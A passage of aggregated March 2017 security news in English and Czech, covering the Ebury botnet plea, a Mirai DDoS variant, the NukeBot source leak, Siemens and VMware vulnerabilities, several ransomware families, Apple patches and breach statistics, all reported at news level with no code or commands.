Ebury backdoor gives attackers full shell control of infected machines remotely even if passwords for affected user accounts are changed on a regular basis.

Ebury botnet network of thousands of compromised Linux systems had the capacity of sending over 35 million spam messages and redirecting more than 500,000 Web visitors to exploit kits every day.
According to the US Department of Justice, Senakh, along with the criminal organization, used Ebury to create and operate a botnet that would "generate and redirect internet traffic in furtherance of various click-fraud and spam e-mail schemes, which fraudulently generated millions of dollars in revenue."
Senakh also admitted to personally profiting from the Ebury botnet. He is scheduled to be sentenced on 3rd August 2017, after pleading guilty to a conspiracy to violate the Computer Fraud and Abuse Act.

Senakh faces up to a combined 30 years in prison.
Ebury first came into the news in 2011 after Donald Ryan Austin, 27, of El Portal, Florida, installed Ebury on multiple servers owned by kernel.org and the Linux Foundation, which is used to maintain and distribute the Linux operating system kernel.
Austin, with no connection to the Ebury criminal organization, was arrested last year in September and charged with four counts of "intentional transmission causing damage to a protected computer."


New Mirai Variant Unleashes 54-Hour DDoS Attack

29.3.2017 securityweek Attack
New Variant of Infamous IoT Botnet Launches Attack Against Network of U.S. College

A newly discovered variant of the Mirai botnet was responsible for powering a 54-hour distributed denial of service (DDoS) attack, Imperva researchers reveal.

Mirai was one of the most discussed Internet of Things (IoT) botnets during the second half of last year, after it was used in two large attacks against Brian Krebs’ blog and DNS provider Dyn. In October, the Trojan’s source code leaked online and new variants emerged soon after.

One such version emerged in December when TalkTalk Telecom home routers were being infected via a vulnerability in the network router protocol. Earlier this year, researchers observed a Windows variant of Mirai, though concluded that it was mainly designed to spread the Linux Trojan to more IoT devices.

The new version, Imperva says, is one of the variants that spawned after the source code leaked. Specifically, while previous versions of the malware launched network layer DDoS attacks, the new variant focuses on application layer assaults, the researchers discovered.

On Feb. 28, the new Mirai threat was used to launch a DDoS attack against a US college, and researchers say that the assault continued for 54 hours straight. The average traffic was of over 30,000 requests per second (RPS) and peaked at around 37,000 RPS, the highest of any Mirai botnet (the attack generated a total of over 2.8 billion requests).

“Based on a number of signature factors, including header order, header values and traffic sources, our client classification system immediately identified that the attack emerged from a Mirai-powered botnet,” Imperva’s Dima Bekerman explains.

The device types used in this attack were already known to be abused by Mirai: CCTV cameras, DVRs and routers. These devices might have been impacted by known vulnerabilities that the botnet exploited via open telnet (23) ports and TR-069 (7547) ports.

According to Bekerman, the DDoS bots used in the attack were hiding behind different user-agents compared to the five previously seen hardcoded in the default Mirai version. These details suggest that the new Mirai variant might have been modified to launch more elaborate application layer attacks.

30 user-agent variants were spotted during the attack, Imperva says. Furthermore, the security researchers observed attack traffic originating from 9,793 IPs worldwide, with over 70% of them located in ten countries: United States (18.4%), Israel (11.3%), Taiwan (10.8%), India (8.7%), Turkey (6%), Russia (3.8%), Italy (3.2%), Mexico (3.2%), Colombia (3.0%), and Bulgaria (2.2%).

“Less than a day after the initial assault ended, another one began that lasted for an hour and a half with an average traffic flow of 15,000 RPS. Based on our experience, we expect to see several more bursts before the offender(s) finally give up on their efforts,” Bekerman says.


NukeBot Source Code Leaked After Marketing Fail

29.3.2017 securityweek BotNet
The developer of the NukeBot banking Trojan has decided to release the malware’s source code after he failed to convince the cybercrime community that his creation is worth buying and that he is not a scammer.

NukeBot, also known as Nuclear Bot, was first advertised on underground cybercrime forums in early December 2016, when it had been offered for sale for $2,500.

However, NukeBot’s developer, a Russian-speaking individual who uses the online moniker “Gosya,” had a poor marketing strategy that led to him being banned from underground forums.

According to IBM X-Force researchers, Gosya was introduced to hacking forums by a known member, but he failed to follow some important rules. Experts said he immediately started advertising his creation, without gaining the trust of the marketplace’s administrators and without giving them the chance to certify his malware.

The developer of FlokiBot and other cybercriminals asked Gosya to prove the malware’s capabilities by providing technical details, but he became nervous and defensive. The members of cybercrime forums became even more suspicious when the NukeBot developer started advertising his product using different monikers on various websites. He even changed the malware’s name to Micro Banking Trojan before he was banned from forums.

In mid-March, Gosya decided to make the NukeBot source code public. While Gosya may have appeared to be a scammer, IBM has confirmed that NukeBot is a legitimate banking Trojan, and an analysis conducted by Arbor Networks in December showed that Gosya’s product did in fact work right from the start.

IBM said NukeBot is a modular Trojan that comes with a web-based administration panel and web injection capabilities. On the other hand, IBM said the malware is not capable of bypassing the company’s Trusteer Rapport product as claimed by Gosya.

The developer may have hoped that leaking the source code will give others the chance to test his creation. This could also be a good marketing move as his Trojan might not only be used in attacks, but it will likely be increasingly discussed on security blogs, experts said.

“With yet another malware source code out in the open, the most likely scenario is that NukeBot code will be recompiled and used by botnet operators,” said Limor Kessem, executive security advisor at IBM. “Parts of it may be embedded into other malware codes, and we are likely to see actual NukeBot fraud attacks in the wild in the coming months.”


Siemens RUGGEDCOM Devices Affected by Several Flaws

29.3.2017 securityweek Vulnerebility
Siemens has shared recommendations for mitigating several medium and high severity vulnerabilities affecting some of the company’s RUGGEDCOM products.

Four types of security holes have been identified in RUGGEDCOM appliances running any version of ROX I (Rugged Operating System on Linux). The affected products are industrially hardened security appliances with integrated router, firewall and VPN functionality. They are used worldwide at electric utility substations, traffic control cabinets and in other harsh environments.

A majority of the vulnerabilities were discovered and reported by researcher Maxim Rupp, including cross-site scripting (XSS), path traversal, privilege escalation and cross-site request forgery (CSRF) issues. One XSS flaw was also discovered by Siemens itself.

Rupp has identified roughly 20 parameters that allow hackers to launch XSS attacks and execute arbitrary JavaScript code due to improper input validation (CVE-2017-2687). The expert has also identified a path traversal vulnerability (CVE-2017-2686) that can be exploited to read arbitrary files and possibly access sensitive information.

Another flaw, described as a privilege escalation (CVE-2017-2689), can be exploited to bypass access restrictions and obtain privileged file system access or change configuration settings.

The security hole exists due to several issues related to improper access control mechanisms, missing checks for unrestricted file uploads, and server misconfigurations.

Rupp has also identified a CSRF vulnerability (CVE-2017-2688) that can be exploited to perform various actions on behalf of a logged-in user who is tricked into clicking on a malicious link. The researcher said an attacker can combine the CSRF with the privilege escalation flaw to access files on the host without access to the device’s web interface.

The vulnerabilities affect the web interface on port 10000/TCP and they either require the targeted user to click on a link, or the attacker needs to have network access and valid credentials in order to exploit them.

Advisories have been made available by ICS-CERT, Siemens and Rupp. While it hasn’t released any updates, Siemens has advised users to obtain a mitigation tool that can be used to disable the web interface and guest/operator accounts on the affected ROX I devices. The vendor also recommends limiting access to trusted admins, and using VPNs.

“As a general security measure Siemens strongly recommends to protect network access to the web interface at 10000/TCP of ROX I-based devices with appropriate mechanisms. It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment,” Siemens said.


This Stealthy Malware Remained Unnoticed for Three Years

29.3.2017 securityweek Virus
Stealthy command and control methods allowed a newly discovered malware family to fly under the radar for more than three years, Palo Alto Networks security researchers reveal.

Dubbed Dimnie, the threat was discovered in mid-January 2017, when it was targeting open-source developers via phishing emails. An attached malicious .doc file contained embedded macro code that executed a PowerShell command to download and execute a file.

The first samples pertaining to this malware family dated back to early 2014, but the use of stealthy command and control (C&C) methods, combined with a Russian-focused target base helped the threat remain unnoticed until this year. Dimnie, which attempted a global reach with its January 2017 campaign, is capable of downloading additional malware and stealing information from compromised systems.

The malware has a modular design and can hinder analysis by injecting each of its modules into the memory of core Windows processes. What’s more, the malware appears to have undergone a series of changes over time, Palo Alto Networks reveals.

Looking at the threat’s communication with the C&C infrastructure, the security researchers discovered that it uses HTTP Proxy requests to the Google PageRank service, which hasn’t been available to the public since last year. Because the absolute URI in the HTTP request is for a non-existent service, the server isn’t acting as a proxy, and the seemingly RFC compliant request is merely camouflage.

The HTTP traffic also reveals that the malware uses an AES key to decrypt payloads (which have been previously encrypted using AES 256 in ECB mode). The server’s reply also contains a Cookie value, which is a 48 byte, base64 encoded, AES 256 ECB encrypted series of UINT32 values pertaining to the payload. The malware uses the Cookie parameter to verify the payload’s integrity.

One of the threat’s modules can exfiltrate data using HTTP POST requests to another Google domain, gmail[.]com. These requests, however, are hardcoded to be sent to an attacker controlled server. The malware attempts to hide its presence by masquerading the network traffic as legitimate requests. The data is once again encrypted, the security researchers say.

Analyzing the manner in which Dimnie handles payloads, the researchers discovered that data isn’t written to disk, but the payloads are simply downloaded and subsequently injected directly into memory. The various modules the malware downloads can: extract PC information and send it to the C&C server; enumerate running processes and send the list; log keystrokes, take screenshots; send logged keys and clipboard data to the server; and delete all files on the C:\ drive.

According to Palo Alto, the malware’s main functionality appears to be information stealing and reconnaissance. However, the threat’s modular framework supposedly allows attackers to use numerous capabilities, and the malware might be able to perform other operations as well, courtesy of modules that haven’t been observed during analysis.

“Multiple factors have contributed to Dimnie’s relatively long-lived existence. By masking upload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders’ assumptions about what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian speakers, likely allowed Dimnie to remain relatively unknown,” Palo Alto researchers conclude.


VMware Patches Flaws Disclosed at Pwn2Own

29.3.2017 securityweek Vulnerebility
VMware has released updates and patches for its ESXi, Workstation and Fusion products to address critical and moderate severity vulnerabilities disclosed at the Pwn2Own 2017 competition.

Pwn2Own participants earned more than $200,000 this year for exploits involving VMware virtual machine escapes. Researchers at Qihoo 360 earned $105,000 for an Edge exploit that achieved a VM escape, and Tencent Security’s Team Sniper received $100,000 for a Workstation exploit that leveraged two vulnerabilities.

According to VMware, the Qihoo 360 team leveraged a heap buffer overflow (CVE-2017-4902) and an uninitialized stack memory usage in SVGA (CVE-2017-4903) that allow an attacker in the guest operating system to execute code on the host.

One of the security holes exploited by Team Sniper is an uninitialized memory usage issue (CVE-2017-4904) in the XHCI controller that can be exploited to execute code on the host from the guest OS.

The second flaw disclosed by Team Sniper at Pwn2Own, rated “moderate severity,” is an information leak weakness also caused by uninitialized memory usage (CVE-2017-4905).

The flaws affect ESXi 6.0 and 6.5, Workstation 12.x on all operating systems, and Fusion 8.x on OS X. CVE-2017-4904 and CVE-2017-4905 also affect ESXi 5.5, but the former can only be exploited for denial-of-service (DoS) attacks and not code execution.

Mozilla has also patched a Firefox vulnerability disclosed at Pwn2Own. However, the organization addressed the security bug within a day after it was presented at the hacking competition.

This was not the first time VMware patched flaws disclosed at such an event. Last year, it resolved a Workstation and Fusion vulnerability demonstrated at PwnFest, a hacking competition that took place in South Korea at the Power Of Community (POC) conference.

VMware has also released patches for the recently disclosed Apache Struts2 vulnerability, which the company has classified as “catastrophic.”


Eset vylepšil své firemní bezpečnostní produkty včetně podpory virtualizace

29.3.2017 SecurityWorld Zabezpečení
Dvě zásadní aktualizace svých produktů pro firmy -- nástroje vzdálené správy Remote Administrator (RA) a Virtualization Security -- ohlásil Eset.

Prvně jmenované řešení je nově kompatibilní s nástrojem SIEM (IBM QRadar) a také nabízí režim, který poskytovatelům typu MSP umožní obsluhovat několik zákazníků v rámci jednoho řešení, tzv. mód multitenant.

Virtualization Security je zase rozšířené o nativní podporou VMware NSX, což umožňuje lepší prevenci proti škodlivému kódu a kontrolu systému bez zvýšení nároků na systémové zdroje díky přidání antivirové kontroly na úroveň virtualizované síťové vrstvy.

„Firmy jsou dnes cílem útoků kriminálních skupin mnohem častěji než v minulosti. Proto jsme zaměřili naše úsilí na vylepšování našich řešení pro firmy,“ říká Michael Jankech, Senior Product Manager pro oblast Business Security v Esetu.

Popis řešení podle výrobce:

Remote Administrator umožňuje správcům celkový přehled nad bezpečnostní situací ve firemní síti z webové konzole. A to odkudkoli, stačí jen funkční internetové připojení.

Integrace s IBM QRadar: Všechny hlavní události z nástroje vzdálené správy jsou exportovány do formátu LEEF, který QRadar používá. V IBM konzoli se potom události Esetu zobrazují jako „zdroj protokolů“.
Multitenantní režim: Ideální pro velké společnost s jedním centrálním serverem a různými správci koncových stanic na konkrétních lokalitách, nebo pro MSP spravujících více zákazníků z jednoho serveru, ale potřebují, aby zákazníci neviděli citlivá data dalších zákazníků.
MDM iOS: Správa mobilních zařízení s iOS je integrována přímo do Remote Administratoru, podporuje Apple Device Enrollment Program a umožňuje měnit různá bezpečnostní nastavení od povolení/ zákaz aplikací po anti-theft.

Virtualization Security umožňuje standardní antivirovou ochranu virtuálních strojů prostřednictvím řešení na platformě VMware vShield bez nutnosti instalace jakéhokoliv bezpečnostního produktu do jejich operačních systémů.

Všechny skenovací úlohy jsou směrovány na centrální skener uvnitř appliance Virtualization Security od Esetu, takže nedochází k vícenásobné kontrole dat na virtuálních stanicích.

Podpora VMware NSX: Produkt nativně podporuje mikro segmentaci a automatické spouštění úloh, které přesunou infikovaný stroj do jiného segmentu sítě. Brání se tak dalšímu šíření škodlivého kódu. Po připojení nové virtuální stanice k NSX Manageru se automaticky nasadí Virtualization Security a ihned stanici chrání.
Snadné nasazení: Virtualization Security lze jednoduše instalovat s pomocí nástroje vzdálené správy z jednoho místa.
Vysoká výkonnost: VM infrastruktura je o optimalizaci zdrojů a výkonu -- a skenovací řešení Esetu tyto požadavky přesně splňuje. Má nízké nároky na systém a pracuje rychle, takže dává více prostoru pro ostatní aplikace a procesy.


Russian Pleads Guilty to Role in Linux Botnet Scheme

29.3.2017 securityweek BotNet
Maxim Senakh, 41, of Velikii Novgorod, Russia, pleaded guilty on Tuesday before a U.S. judge to charges related to an international scheme involving the Linux botnet known as Ebury.

Senakh has pleaded guilty to conspiracy to violate the Computer Fraud and Abuse Act (CFAA) and conspiracy to commit wire fraud. The man was indicted by U.S. authorities in January 2015 and he was arrested in Finland in August 2015. Finland extradited the suspect to the United States in January 2016. Sentencing is scheduled for August 3.

According to the Department of Justice, Senakh has admitted taking part in a criminal enterprise that made millions of dollars by infecting tens of thousands of servers with malware.

The cybercriminals used the Linux malware Ebury to power a botnet that helped them make money through click-fraud and email spam operations. Senakh said he registered the domains used for the botnet’s command and control (C&C) infrastructure. He admitted profiting from the traffic generated by the Ebury botnet.

The Ebury malware was first spotted in 2011. ESET, Germany’s CERT‑Bund, the Swedish National Infrastructure for Computing, the European Organization for Nuclear Research (CERN) and other organizations published an analysis of the Ebury malware in February 2014.

The malware, tracked by ESET as Linux/Ebury, was described by the security firm as a sophisticated OpenSSH backdoor and credential stealer.

CERT-Bund reported spotting thousands of infected systems across more than 60 countries, including in the United States, Germany, France, Italy, U.K., Netherlands, Russia, Ukraine, Mexico and Canada.

Since Ebury had rootkit capabilities, experts advised users at the time to reinstall the operating system on compromised machines instead of attempting to clean the infection.

Earlier this month, another Russian national, Mark Vartanyan, aka “Kolypto,” pleaded guilty in a U.S. court to charges related to the development and distribution of the Citadel Trojan.


Cerber Ransomware Tries to Evade Machine Learning Security

29.3.2017 securityweek Virus
The Cerber ransomware is using new evasion techniques designed elude machine learning security solutions, and has been observed being dropped onto compromised systems alongside the Kovter click-fraud Trojan.

Discovered in March last year, Cerber has grown to become one of the most prevalent ransomware families out there. Not only did the malware receive various enhancements over the past year, but it also used numerous distribution channels, including spam emails and exploit kits, as well as other malware.

In August last year, Invincea researchers discovered that Cerber was being distributed by Betabot, a piece of malware initially designed as a banking information stealing Trojan. Now, Cyren researchers are seeing Cerber being dropped by Kovter, a click-fraud Trojan that was dropping Locky several months ago.

The campaign uses spam emails with a JS downloader inside a .ZIP archive and relies on victims unknowingly activating the downloader, which immediately fetches both malware families. The ransomware encrypts users’ files and announces that via a ransom note, but the Kovter malware remains silent, especially since it is capable of fileless infections.

According to Cyren, Kovter was paired with Cerber to maximize system resources for ad fraud, if the victim leaves the infected system idle; to ensure the malware remains on the system after Cerber is removed (the victim will focus on the ransomware, not on the fileless Trojan); or to diversify revenue.

What the researchers are certain about, however, is that anti-sandbox and anti-detection technology is used to ensure maximum infection success. Similarly, Trend Micro security researchers have observed Cerber using a new loader that can evade not only traditional security mechanisms, but machine learning solutions as well. The loader, they say, has been designed to hollow out a normal process and run Cerber’s code instead.

The observed campaign relies on spam emails to deliver a link to a self-extracting archive that has been uploaded to a Dropbox account controlled by the attackers, and which contains three files: a Visual Basic script, a DLL file, and a binary file that looks like a configuration file. The script was designed to run using the Windows Script Host and to load the DLL file using rundll32.exe with the DLL’s filename.

The DLL, which is not packed or encrypted, reads the configuration file, decrypts part of it, and executes the decrypted code, which contains the loader and configuration settings. The loader checks if it runs in a virtual machine or sandbox, if analysis tools are installed, and if anti-virus software is running and ends the infection process if it finds any. Next, the main payload (the Cerber binary) is injected in another process.

“The new packaging and loading mechanism employed by Cerber can cause problems for static machine learning approaches–i.e, methods that analyze a file without any execution or emulation. Self-extracting files and simple, straightforward files could pose a problem for static machine learning file detection. In other words, the way Cerber is packaged could be said to be designed to evade machine learning file detection,” Trend Micro explains.

The good news, the researchers say, is that this new evasion technique can be defeated by security approaches that employ multiple layers of protection, because the attack has other weaknesses, such as the use of an unpacked .DLL file. Solutions that don’t overly rely on machine learning can still prove effective against this threat.


PyCL Ransomware Test Campaign Spotted in the Wild

29.3.2017 securityweek Virus
A new ransomware family being dropped by the RIG exploit kit (EK) appears to be in the testing phase and could surface as a major threat, security researchers warn.

Dubbed PyCL, the ransomware variant was seen being distributed via the EITest compromise chain into the RIG EK, one of the largest malware distributors at the moment. The malware is written in Python, with the script called cl.py, which determined BleepingComputer’s Lawrence Abrams to name the threat PyCL.

The ransomware was first dropped by EITest-RIG on Sunday, in a campaign that abused hacked websites to redirect visitors to the EK and attempted to exploit vulnerabilities on their computers for further compromise. However, PyCL was dropped for a single day, and the security researcher sees it as an indicator that this was only a test run.

The new threat is distributed as an NSIS installer that contains a Python package designed to encrypt the user’s files, and a tutorial on how to pay the ransom. Apparently, the malware communicates with the command and control (C&C) server during each stage of the encryption process, to provide debugging/status information to the developer.

David Martínez, one of the researchers who discovered the malware (alongside Kafeine, MalwareHunterteam, BroadAnalysis), found a file called user.txt in the installer and discovered that a string in it is being sent to the C&C during every request. According to Abrams, this suggests the PyCL is part of a Ransomware as a Service (RaaS), where the username is the affiliate identifier.

The ransomware was first observed checking if it has administrative privileges and deleting the shadow volume copies on the computer if it does. Next, the malware sends the victim’s Windows version to the C&C, along with details such as administrative privileges, screen resolution, processor architecture, computer name, username, and the MAC address of the primary network adapter.

PyCL uses a unique AES-256 encryption key for each file, saves the list of files and their decryption keys to a random named file in the CL folder, and encrypts the file using the RSA-2048 public encryption key.

While most ransomware families replace user’s files with their encrypted counterparts, this piece of malware leaves the original files on the hard disk, meaning that users don’t have to pay the ransom to get them back (this, however, might change in future versions of the malware). Finally, PyCL displays a lock screen that contains a 4-day timer, a Bitcoin address, and the ransom amount.


Škodlivé reklamy na zahraničních porno webech kradou údaje k bankovnictví

28.3.2017 Novinky/Bezpečnost Kriminalita
Trojský kůň Ramnit se šíří prostřednictvím reklamního systému, který načítá reklamní bannery v novém okně prohlížeče. Přesměruje oběť na server útočníka, z něhož stáhne škodlivý program.
Ramnit se šíří prostřednictvím několika největších porno stránek ve Velké Británii a Kanadě. Jde o takzvaný exploit kit, který se stáhne do infikovaného zařízení a umožňuje vzdálenou správu napadeného počítače.

Konkrétně Ramnit se zaměřuje na přihlašovací údaje k internetovému bankovnictví a také k FTP serverům. V minulosti tento trojský kůň způsobil řadu škod, ale poté takřka vymizel. Znovu se začal objevovat v roce 2015 a loni v srpnu jej použili útočníci při napadení šesti největších bank ve Velké Británii.

Stačilo kliknout na miniaturu fotky nebo videa
„Po asi osmi měsících, kdy nevyvíjel žádnou aktivitu, bezpečnostní analytici narazili na dva nové servery, jejichž prostřednictvím útočníci vzdáleně ovládají zařízení napadená Ramnitem,“ přiblížil na webu SecurityIntelligence.com bezpečnostní expert společnosti IBM Limor Kessem.

„Útočníci poté spustili škodlivou kampaň ve Velké Británii a šíří nové konfigurace trojanu doplněné o další druhy malware, jejichž cílem je získat přístupové údaje uživatelů k internetovému bankovnictví,“ dodal.

Konkrétně u nejpopulárnějších porno stránek ve Velké Británii a Kanadě se vir šíří tak, že uživatel klikne na miniaturu obrázku ve zvolené kategorii galerií nebo videí a tím spustí i pop-okno se škodlivou reklamou.

Jeho prostřednictvím se do zařízení stáhne trojský kůň Ramnit, který poté vyvíjí v napadeném počítači skryté aktivity. Útočníci při této kampani zneužili reklamní síť ExoClick, která okamžitě po odhalení této kampaně přijala opatření k zastavení škodlivého inzerenta.

Pozor by si měli dávat i Češi
Bankovní malware útočí i v České republice. Nejde sice o zmiňovaný Ranmit, ale o trojského koně Android\Trojan.Spy.Banker.HV, který se zaměřuje na mobilní zařízení s operačním systémem Android.

Malware se šíří prostřednictvím falešných SMS zpráv.
„Šíří se podvodnými zprávami SMS. Podle aktuálních informací se útočníci prozatím zaměřili jen na ČSOB. Dá se však očekávat, že okruh cílových bank se brzy rozšíří,“ varuje Lukáš Štefanko, analytik malware ve společnosti ESET. Malware se šíří prostřednictvím falešných SMS zpráv, které předstírají komunikaci České pošty nebo obchodu Alza.cz.

Falešná zpráva uživatele vyzve, aby si otevřel stránku internetového bankovnictví. Místo ní však podsune falešnou přihlašovací stránku. Nepozorný uživatel tak nevědomky odešle své přihlašovací údaje podvodníkům a vystaví se hrozbě vykradení účtu. Během letošního února se takto v Česku a na Slovensku rozšiřovaly falešné SMS s odkazem na údajnou aplikaci společnosti DHL.

Ochrana před podobnými útoky je poměrně prostá. „K omezení rizik doporučuji dodržovat především dvě základní bezpečností opatření. V prvé řadě je nutné nenechat se přimět k instalování aplikací pomocí odkazů, které mohou vést na podvodnou stránku. Aplikaci, kterou chce uživatel instalovat, je třeba si vždy vyhledat v oficiálním obchodě s aplikacemi nebo na důvěryhodných stránkách,” vysvětluje Lukáš Štefanko ze společnosti ESET.


Jaké aplikace představují v PC největší bezpečnostní problém

28.3.2017 Novinky/Bezpečnost Zabezpečení
Flash, Java či WinZip. To jsou aplikace, které používá na počítačích drtivá většina uživatelů. Právě kvůli jejich popularitě se na ně ale velmi často zaměřují také počítačoví piráti. A to je problém, neboť uživatelé velmi často aktualizaci těchto aplikací podceňují. Nevědomky tak kyberzločincům otevírají zadní vrátka do svého počítače.
O tom, že uživatelé velmi často podceňují aktualizace nejpoužívanějších programů, pojednává analýza antivirové společnosti Avast. Podle ní je více než polovina (52 %) nejrozšířenějších počítačových aplikací včetně Flashe a Javy v počítačích uživatelů zastaralá.

„V on-line světě hrají bezpečnostní návyky, jako je pravidelná aktualizace softwaru, důležitou roli pro osobní bezpečnost na internetu. Zkušení hackeři umějí přesně zacílit na slabiny, a právě používáním neaktualizovaných programů jim lidé útok usnadňují,“ řekl technický ředitel Avastu Ondřej Vlček.

Aktualizace často odkládají
Podle něj uživatelé aktualizace často odkládají a pak na ně i přes upozornění zapomenou. V některých případech ji mohou provést špatně a kvůli tomu se program již dále neaktualizuje – například pokud při přeinstalaci nenechají zatrženou volbu „aktualizovat automaticky“.

Žebříčku nejvíce zastaralých aplikací kraluje již výše zmíněná Java. Jde o rozhraní používané v prostředí webu a některých aplikací, jehož verzi s pořadovými čísly šest a sedm používá více než 24 miliónů uživatelů. „Zatímco dalších 26 miliónů uživatelů má nejnovější verzi Java 8, více než 70 % z nich si ještě nenainstalovalo poslední vydanou aktualizaci,“ podotkl Vlček.

Druhou příčku obsadil Flash Player, tedy aktuálně jeden z nejpopulárnějších programů pro přehrávání videí na internetu. „Ten by si pro Internet Explorer mělo aktualizovat 99 % uživatelů,“ řekl Vlček.

Flash Player používá na celém světě několik stovek miliónů lidí. Právě kvůli velké popularitě se na Flash Player zaměřují kybernetičtí nájezdníci pravidelně. Podle analýzy bezpečnostní společnosti Record Future cílilo osm z deseti nejrozšířenějších hrozeb v roce 2015 právě na tento přehrávač videí.

Počítač dávají všanc pirátům
Nepříliš lichotivá bronzová medaile patří aplikaci Foxit Reader, u které 92 % uživatelů pracuje se zastaralou verzí.

Přitom chyby v těchto aplikacích patří velmi často mezi kritické. To jinými slovy znamená, že útočník může prostřednictvím této trhliny v krajním případě klidně i převzít kontrolu nad napadeným systémem. Může se tak snadno dostat k uloženým datům, případně odchytávat přihlašovací údaje na různé webové služby.

Takový stroj se pak klidně i bez vědomí uživatele může stát součástí botnetu (síť zotročených počítačů), který kyberzločinci zpravidla zneužívají k rozesílání spamu nebo k DDoS útokům. Pokud uživatelé nenainstalují včas aktualizace, vystavují svůj stroj všanc počítačovým pirátům.

„Naopak mezi nejvíce aktualizované aplikace se zařadily Google Chrome z 88 %, Opera z 84 % a Skype z 76 %. Procenta ukazují, že ani aplikace s automatickou aktualizací nemusí být vždy aktualizované,“ uzavřel Vlček.

Nejméně aktualizované programy
1. Java (Runtime 6, 7), Oracle Corporation
2. Flash Player (Active X), Adobe Systems
3. Foxit Reader, Foxit Software
4. GOM Media Player, Gretech
5. Nitro Pro, Nitro Software
6. WinZip, Corel Corporation
7. DivX, DivX LLC
8. Adobe Shockwave Player, Adobe Systems
9. 7-ZIP, Igor Pavlov
10. Firefox, Mozilla
Zdroj: Avast


Apple Patches Hundreds of Vulnerabilities Across Product Lines

28.3.2017 securityweek Apple

Apple Patches Desktop, Mobile, Wearable Platforms to Fix More than 200 Security Vulnerabilities

Apple on Monday released security patches for its macOS and macOS Server, iOS, watchOS, tvOS, Safari, and Pages, to address over 200 vulnerabilities.

No less than 127 vulnerabilities were addressed with the release of macOS Sierra 10.12.4 (and Security Update 2017-001 El Capitan and Security Update 2017-001 Yosemite). These affected components such as apache, Audio, Bluetooth, FontParser, ImageIO, IOFireWireAVC, Kernel, OpenSSH, OpenSSL, QuickTime, Security, tcpdump, tiffutil, and WebKit.

tcpdump was affected the most, as the tech giant resolved 41 vulnerabilities in this component alone. By leveraging these flaws, an attacker in a privileged network position could be able to execute arbitrary code with user assistance, Apple notes in its advisory. The company also resolved 11 bugs in Kernel and 8 flaws in tiffutil.

Some of the flaws resolved in macOS Sierra 10.12.4 include memory corruption, inconsistent user interface issues, out-of-bound read, access and validation issues, buffer overflow, uncontrolled format string, timing side channel bug, profile uninstallation issue, use after free, and race condition. Many were addressed by improved input validation or improved memory handling.

Tracked as CVE-2017-2485 and discovered by Cisco Talos, a memory corruption issue was found in the parsing of certificates and was addressed through improved input validation. According to Apple, the issue could lead to arbitrary code execution when processing a maliciously crafted x509 certificate. Talos reveals that this use-after-free vulnerability (which affects iOS as well) manifests due to improper handling of X.509v3 certificate extensions fields.

“An application that passes a malicious certificate to the certificate validation agent could trigger this vulnerability. Possible scenarios where this could be exploited include users connecting to a website which serves a malicious certificate to the client, Mail.app connecting to a mail server that provides a malicious certificate, or opening a malicious certificate file to import into the keychain,” the researchers say.

The macOS Sierra 10.12.4 update also includes the security content of Safari 10.1, Apple says. In a separate advisory, the company explains that 38 bugs were squashed in the browser, 33 of which affect WebKit (three were found in WebKit JavaScript Bindings and WebKit Web Inspector). The security update addresses memory corruption, prototype access, keychain handling, information disclosure, and validation issues.

iOS 10.3 was released on Monday with fixes for 84 flaws affecting Accounts, Audio, CoreGraphics, CoreText, FontParser, ImageIO, Kernel, libarchive, Profiles, Safari, Security, and WebKit, among other components (many of the fixed issues were impacting macOS, Safari).

Some of the addressed flaws include a buffer overflow in the handling of font files, an infinite recursion, multiple memory corruption issues, out-of-bounds read bugs, or the sending of requests to iTunes sandbox web services in cleartext. Affecting how Safari handles JavaScript pop-ups, one of the flaws was abused by attackers to lock victims from using the browser and scare them into paying a ransom in the form of an iTunes Gift Card.

Also released on Monday, tvOS 10.2 addresses 56 bugs, while watchOS 3.2 resolves 34 of them. Additionally, Apple pushed out macOS Server 5.3 to resolve 3 vulnerabilities (in Profile Manager, Web Server, and Wiki Server), and Pages 6.1, Numbers 4.1, and Keynote 7.1 for Mac and Pages 3.1, Numbers 3.1, and Keynote 3.1 for iOS, to address one issue in Export.


1.4 Billion Records Compromised in 2016: Report

28.3.2017 securityweek Crime

Nearly 1.4 billion records were compromised in 2016 as a result of roughly 1,800 data breaches, according to Gemalto’s latest Breach Level Index report.

The company said the number of compromised records increased by 86 percent compared to the previous year. The report also shows that more than 1,000 incidents, or 59 percent of the total, involved theft of identity information, while nearly 30 percent involved financial and account data.

Data collected by Gemalto shows that 68 percent of data breaches were the work of malicious external hackers, while 19 percent of incidents were classified as accidental leaks. Malicious insiders accounted for 9 percent of breaches.

The most serious breaches mentioned in the report affected FriendFinder Networks (412 million records), the Philippines Commission on Elections (77 million records), DailyMotion (85 million records), Fling (40 million records), the Indian state of Kerala (34 million records), and Evony (33 million records).

The Yahoo breaches disclosed last year, which involved hundreds of millions of user records, were not taken into account due to the fact that the incidents occurred in 2013 and 2014. Based on the same logic, the Fling breach should have been excluded as well as it appears to have occurred in 2011.

Furthermore, the report also lists the “17” streaming app with 30 million records, but an analysis of the hackers’ claims showed that the actual number of compromised records was roughly 4 million.

According to Gemalto, the healthcare industry was hit the hardest in terms of the number of incidents, and accounted for more than a quarter of breaches. Other affected sectors are government (15%), retail (12%), financial services (12%), and technology (11%).

When it comes to the number of compromised records, the government and tech sectors take the lead with roughly 391 million records each.

As for the geographical distribution of affected organizations, 80 percent of the breaches catalogued by Gemalto affected the United States.

Gemalto breach level index

The company said more than 7 billion records were lost or stolen since 2013, which means that, on average, more than 4.5 million records are compromised every day. Of all the incidents known to Gemalto, only 4 percent involved efficient encryption that made the exposed data useless.

Risk Based Security reported in January that the total number of records exposed in 2016 was 4.2 billion, but the company also included the Yahoo, MySpace and other incidents that took place in previous years.


Shamoon 2 – Palo Alto Networks sheds lights on the method for network distribution
28.3.2017 securityaffairs Virus

Security researchers at Palo Alto Networks have determined that the Shamoon 2 malware uses a rudimentary technique for network distribution.
Security researchers at Palo Alto Networks continue to analyze the dreaded Shamoon 2 malware and the recent waves of attacks, now they have determined that the threat uses a rudimentary technique for network distribution.

The Shamoon 2 malware was first spotted in November 2016, a second variant of the same threat was discovered by researchers at Palo Alto Networks in January and it was able to target virtualization products.

Shamoon, also known as Disttrack, was first discovered in a wave of attacks that targeted companies in Saudi Arabia in 2012. Among the victims, there was the petrol giant Saudi Aramco. The principal capability of Shamoon is a feature that allows it to wipe data from hard drives of the infected systems.

